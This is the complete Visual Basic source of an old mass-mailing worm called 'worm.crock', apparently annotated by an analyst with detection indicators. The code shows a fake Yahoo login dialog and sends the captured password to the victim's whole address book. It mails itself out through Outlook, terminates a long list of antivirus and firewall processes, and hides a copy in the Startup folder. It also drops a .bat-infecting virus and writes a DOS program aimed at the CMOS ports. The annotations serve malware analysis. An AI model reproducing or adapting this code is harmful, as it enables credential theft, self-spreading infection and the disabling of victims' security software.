Strange Article - worm.crock by vAndEEd0
VERSION 5.00
Begin VB.Form Crock
Appearance = 0 'Flat
AutoRedraw = -1 'True
BackColor = &H8000000C&
BorderStyle = 0 'None
Caption = "Form1"
ClientHeight = 2070
ClientLeft = 0
ClientTop = 0
ClientWidth = 4455
DrawMode = 1 'Blackness
ForeColor = &H8000000D&
Icon = "crock.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
Moveable = 0 'False
NegotiateMenus = 0 'False
Picture = "crock.frx":07F2
ScaleHeight = 2070
ScaleWidth = 4455
ShowInTaskbar = 0 'False
StartUpPosition = 2 'CenterScreen
Begin VB.TextBox Text1
BeginProperty Font
Name = "MS Sans Serif"
Size = 8.25
Charset = 0
Weight = 700
Underline = 0 'False
Italic = -1 'True
Strikethrough = 0 'False
EndProperty
Height = 285
Left = 1080
TabIndex = 3
Top = 600
Width = 3135
End
Begin VB.TextBox Text2
Height = 285
IMEMode = 3 'DISABLE
Left = 1080
PasswordChar = "*"
TabIndex = 2
Top = 1080
Width = 3135
End
Begin VB.CommandButton Command1
Caption = "&OK"
DragIcon = "crock.frx":0FE4
BeginProperty Font
Name = "MS Sans Serif"
Size = 8.25
Charset = 0
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height = 375
Left = 1920
TabIndex = 1
Top = 1560
Width = 1095
End
Begin VB.CommandButton Command2
Caption = "&Cancel"
BeginProperty Font
Name = "MS Sans Serif"
Size = 8.25
Charset = 0
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height = 375
Left = 3120
TabIndex = 0
Top = 1560
Width = 1095
End
Begin VB.Label Label3
Appearance = 0 'Flat
BackColor = &H8000000C&
Caption = "Connect to everything in Y!"
BeginProperty Font
Name = "Arial"
Size = 9.75
Charset = 0
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
ForeColor = &H8000000D&
Height = 255
Left = 720
TabIndex = 6
Top = 120
Width = 3495
End
Begin VB.Label Label1
Appearance = 0 'Flat
AutoSize = -1 'True
BackColor = &H8000000C&
Caption = "Yahoo ID"
BeginProperty Font
Name = "Times New Roman"
Size = 9
Charset = 0
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
ForeColor = &H8000000D&
Height = 225
Left = 120
TabIndex = 5
Top = 600
Width = 735
End
Begin VB.Label Label2
Appearance = 0 'Flat
AutoSize = -1 'True
BackColor = &H8000000C&
Caption = "Password"
BeginProperty Font
Name = "Times New Roman"
Size = 9
Charset = 0
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
ForeColor = &H8000000D&
Height = 225
Left = 120
TabIndex = 4
Top = 1080
Width = 720
End
End
Attribute VB_Name = "Crock"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
' worm.crock
' May 30, 2003 - vAndEEd0
' Features: shows a fake Yahoo! login dialog box
' 1. mass-mails itself only if Cancel is clicked
' 2. attempts to reset the CMOS on the first Tuesday of an even month
' 3. registers itself as a service
' 4. sets the hidden attribute on its copy in the startup folder
' 5. drops a simple .bat-infecting virus in the startup folder
' 6. disables AV software
' 7. mails the entered Yahoo username and password to network mail (MAPI recipients) if OK is clicked
' 8. compiled to p-code
' 9. used upx124 and crafted
' Analyst note: module-level declarations for the Crock form. Everything here
' supports process enumeration/termination, self-location and mail content.
' Flag passed to CreateToolhelp32Snapshot in Form_Load to request a process list.
Const TH32CS_SNAPPROCESS As Long = 2&
' Buffer size for the module path and for PROCESSENTRY32.szExeFile.
Const MAX_PATH As Long = 260
' Access mask requested by Form_Load when it opens a process it then terminates.
Const PROCESS_ALL_ACCESS = &H1F0FFF
' VB mirror of the Toolhelp process record; the visible code reads
' th32ProcessID and szExeFile and sets dwSize before the first call.
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
' Declared but not called anywhere in the visible source.
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
' Toolhelp snapshot + iteration: used in Form_Load to walk running processes.
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)
' OpenProcess + TerminateProcess: the pair Form_Load uses against security tools.
' Detection: a user-mode program importing these together with the Toolhelp
' APIs and a hard-coded list of AV names is a strong triage signal.
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
' Used in Form_Load to obtain the full path of the running executable (CrockName).
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
' Windows 9x-era kernel32 export; Form_Load calls it with (0, 1), which the
' header comment describes as "register as service".
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessId As Long, ByVal dwType As Long) As Long
' Mail body and subject, set by the OK/Cancel handlers and consumed by Crocking.
Dim crockBody As String
Dim crockSubject As String
' Full path of the running executable; attached to outgoing mail and copied by Bite.
Dim CrockName As String
' Common Startup folder path read from the registry in Form_Load.
Dim BiteFolder As String
' ********************** 1 and 6 ***********************
' Analyst summary: runs when the fake login form loads. In order it
'   1. calls RegisterServiceProcess(0, 1),
'   2. shows the form and records its own executable path in CrockName,
'   3. walks the process list and terminates any process whose image name
'      contains one of a hard-coded list of antivirus / firewall names,
'   4. reads the logon name and Common Startup path from the registry,
'   5. checks/sets a per-user marker value, hiding the form if it already exists,
'   6. calls Bite (which in turn calls Batch, which calls Jaws).
' Host indicators visible here: the registry value
' HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\System Signature
' and termination of security products shortly after process start.
Private Sub Form_Load()
' Every runtime error in this procedure is silently ignored.
On Error Resume Next
Dim r As Long
r = RegisterServiceProcess(0&, 1)
Crock.Show
On Error Resume Next
' Allocate a MAX_PATH buffer, then trim it to the length GetModuleFileName returns.
CrockName = String$(MAX_PATH, Chr$(0))
CrockName = Left$(CrockName, GetModuleFileName(0&, CrockName, Len(CrockName)))
Dim hSnapShot As Long
Dim uProcess As PROCESSENTRY32
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)
' -1 is the failure value checked for the snapshot handle.
If hSnapShot <> -1 Then
uProcess.dwSize = Len(uProcess)
r = ProcessFirst(hSnapShot, uProcess)
Do While r
' die is an undeclared (Variant) flag, reset for every process.
die = False
' Case-insensitive substring test of the image name against each entry below.
' Several entries are short prefixes (\Scan, \Nav, \Rav, \Avp, \Sweep), so any
' image name containing them is flagged as well, not only the intended product.
' \BLACKICE and \F-STOPW appear twice with different casing; UCase makes the
' duplicates equivalent.
If InStr(UCase(uProcess.szExeFile), UCase("\IOMON98")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Outpost")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\POP3TRAP")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\AVP MONITOR")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Zonealarm")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\NAI_VS_STAT")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\AVPMON")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\BLACKICE")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Wfindv32")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Rav")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Vet95")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\F-STOPW")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Webscanx")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Vscan40")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Sweep")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Rescue")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Scan")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avconsol")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Tbscan")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Persfw")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Serv95")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Safeweb")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Pccwin98")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Pcfwallicon")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Padmin")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Pavw")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Pavsched")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Pavcl")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Nvc95")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Nupgrade")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Normist")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Nmain")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Nav")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\F-Prot")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\N32scanw")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Lockdown2000")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Nisum")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Fprot")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Fp-Win")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\F-Agnt95")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Esafe")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\F-Stopw")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avnt")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Blackice")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avwupd32")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avsched32")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avp")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avwin95")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avkserv")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Apvxdwin")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Anti-Trojan")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\_Avp")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Ackwin32")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Vshwin32")) <> 0 Then die = True
If die = True Then
' Defensive note: this open-with-full-access followed by terminate is the
' observable event; self-protection in the security product and alerting on
' unexpected termination of its processes are the relevant controls.
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, uProcess.th32ProcessID)
If hProcess Then
' ExitCode is never assigned in the visible source.
KillProcess = (TerminateProcess(hProcess, ExitCode) <> 0)
CloseHandle hProcess
End If
End If
r = ProcessNext(hSnapShot, uProcess)
Loop
End If
Call CloseHandle(hSnapShot)
' Windows Script Host shell object, used below only for registry access.
Set Rso = CreateObject("Wscript.Shell")
' Pre-fills the "Yahoo ID" box with the stored logon name, which makes the
' fake dialog look as if it already knows the user.
Text1.Text = Rso.regread("HKEY_LOCAL_MACHINE\Network\Logon\username")
' Common Startup folder path; the second key is tried when the first reads empty.
BiteFolder = Rso.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Folders\Common Startup")
If BiteFolder = "" Then BiteFolder = Rso.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\explorer\Shell Folders\Common Startup")
' "System Signature" acts as a marker: when it reads empty a random number is
' written; otherwise the form is hidden, so the dialog is not shown again.
If Rso.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\System Signature") = "" Then
Rso.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\System Signature", Rnd(555) * 555 + 1
Else
Crock.Visible = False
End If
' Persistence and payload chain starts here (Bite -> Batch -> Jaws).
Call Bite
End Sub
' OK button of the fake dialog. Puts whatever was typed into the ID and
' password boxes, in clear text, into the mail body, then calls Crocking,
' which sends it to every address-book entry it can enumerate.
' Response note: anyone who typed credentials into this dialog should treat
' them as disclosed. The subject line below is a mail-gateway indicator.
Private Sub Command1_Click()
'spread password and username
crockBody = "YahooID: " & Text1.Text & vbNewLine & "password: " & Text2.Text
crockSubject = "Your free yahoo account and file!"
Call Crocking
Unload Me
End Sub
' Cancel button of the fake dialog. Sets a lure subject and body that present
' the attachment as a game, then calls Crocking to mail it out. Dismissing the
' dialog therefore still triggers mailing.
' The subject and the "The Crock" / "Yahooligans!" body text are mail-filter indicators.
Private Sub Command2_Click()
'spread me
crockSubject = "Yahoo Game House"
crockBody = "From the makers of Yahoo Game House, here is a new game from vAndEEd0!" & vbNewLine & vbNewLine & "The Crock" & vbNewLine & vbNewLine & "Yahooligans!"
Call Crocking
Unload Me
End Sub
' Mass-mailing routine shared by both buttons. Automates the local mail client
' through COM: for each address list it creates one message carrying
' crockBody/crockSubject, attaches the running executable (CrockName), adds
' every entry of that list as a recipient and sends it.
' Detection/mitigation: COM automation of the mail client by an unrelated
' process, one message addressed to an entire address list, and an executable
' attachment are all observable; attachment-type blocking at the gateway and
' the mail client's programmatic-access prompts address this behaviour.
Private Sub Crocking()
' Errors (for example, no mail client installed) are silently ignored.
On Error Resume Next
' The ProgID is assembled from fragments and reversed strings; it evaluates to
' "Outlook.Application". Presumably this keeps the literal name out of the
' binary's strings - the effect on string-based scanning is the point to note.
Set Eso = CreateObject("Out" & StrReverse("kool") & "." & StrReverse("ilppA") & "ca" & StrReverse("noit"))
If Eso <> "" Then
' StrReverse("IPAM") evaluates to "MAPI".
Set e1 = Eso.GetNameSpace(StrReverse("IPAM"))
For list1 = 1 To e1.AddressLists.Count
' Item type 0 is passed to CreateItem; the item is then used as a mail message.
Set eva = Eso.CreateItem(0)
eva.Body = crockBody
eva.Attachments.Add CrockName
eva.Subject = crockSubject
Set ctr = e1.AddressLists.Item(list1)
Set emails = ctr.AddressEntries
For countr1 = 1 To emails.Count
eva.Recipients.Add emails.Item(countr1)
Next countr1
eva.Send
Next
End If
End Sub
' Date-triggered destructive payload. When the trigger matches, it writes a
' small DOS .COM program named yaHoo.COM to the current directory and runs it.
' The byte string contains OUT instructions (opcode E6) to I/O ports 70h and
' 71h, the CMOS/RTC index and data ports, inside a loop, followed by the
' signature text - consistent with the header's "attempt reset cmos".
' NOTE(review): the header comment says "first tuesday of even month", but the
' condition below tests only the weekday and day-of-month; no month check is
' visible, so as written it matches the first Tuesday of every month.
' Host indicators: a file named yaHoo.COM and the string
' "worm.crock's jaws - vAndEEd0" inside it.
Private Sub Jaws()
On Error Resume Next
' Weekday = 3 is Tuesday under VB's default Sunday-first numbering; Day < 8
' restricts it to the first week of the month.
If Weekday(Now) = 3 And Day(Now) <8 Then
Open "yaHoo.COM" For Output As #1
Print #1, Chr(&HB9) + Chr(&H40) + Chr(&H0) + Chr(&H8A) + Chr(&HC1) + Chr(&HE6) + Chr(&H71) + Chr(&HB0) + Chr(&HFF) + Chr(&HE6) + Chr(&H70) + Chr(&HE2) + Chr(&HF6) + Chr(&HE9) + Chr(&HF0) + Chr(&HFF) + "worm.crock's jaws - vAndEEd0"
Close #1
' Runs the dropped file; the return value is unused.
garbage = Shell("yaHoo.COM", 1)
End If
End Sub
' Drops a companion batch script. Builds the script text in crocker by string
' concatenation, writes it to CROCK.BAT in the Common Startup folder
' (BiteFolder, set in Form_Load), then calls Jaws.
' The script text contains copy commands targeting a: and c:, a for-loop that
' appends the script to .bat files in several directories, and the marker
' "rem bat.crock by vAndEEd0".
' Host indicators: CROCK.BAT in the Common Startup folder, and .bat files
' containing the "bat.crock by vAndEEd0" marker.
Private Sub Batch()
crocker = "@echo off|rem bat.crock by vAndEEd0"
crocker = crocker & "@copy %0.bat a:" & vnewline
crocker = crocker & "@for %%x in (*.bat \*.bat ..\*.bat c:\*.bat a:\*.bat %windir%\*.bat %winbootdir%\*.bat %temp%\*.bat) do copy %%x+%0.bat %%x|rem bat.crock by vAndEEd0" & vnewline
crocker = crocker & "@copy %0.bat c:" & vnewline
crocker = crocker & "exit" & vnewline
crocker = crocker & "bat.crock" & vnewline
crocker = crocker & "crocko rocks" & vnewline
crocker = crocker & "how simple batch viruses are" & vnewline
crocker = crocker & "very cool huh i like to" & vnewline
crocker = crocker & "format c: /q" & vnewline
crocker = crocker & "vAndEEd0" & vnewline
' From here on, file-system errors are silently ignored.
On Error Resume Next
Set Cso = CreateObject("Scripting.FileSystemObject")
' Second argument 1 is passed as the overwrite flag to CreateTextFile.
Set file = Cso.CreateTextFile(BiteFolder & "\" & "CROCK.BAT", 1)
file.WriteLine crocker
file.Close
Call Jaws
End Sub
' Persistence step. Copies the running executable (CrockName) into the Common
' Startup folder (BiteFolder) as CROCK.EXE or CROCK.SCR, chosen at random, marks
' the copy hidden and read-only, then calls Batch.
' Host indicators: a hidden, read-only CROCK.EXE or CROCK.SCR in the Common
' Startup folder. Hunting should list that folder with hidden files shown.
Private Sub Bite()
On Error Resume Next
Randomize
' Rounds a random value in [0, 1) to 0 or 1 to pick the extension.
x = Round(Rnd(1) * 1)
ThyName = "CROCK."
Select Case x
Case 0
ThyName = ThyName & "EXE"
Case Else
ThyName = ThyName & "SCR"
End Select
FileCopy CrockName, BiteFolder & "\" & ThyName
SetAttr BiteFolder & "\" & ThyName, vbHidden + vbReadOnly
Call Batch
End Sub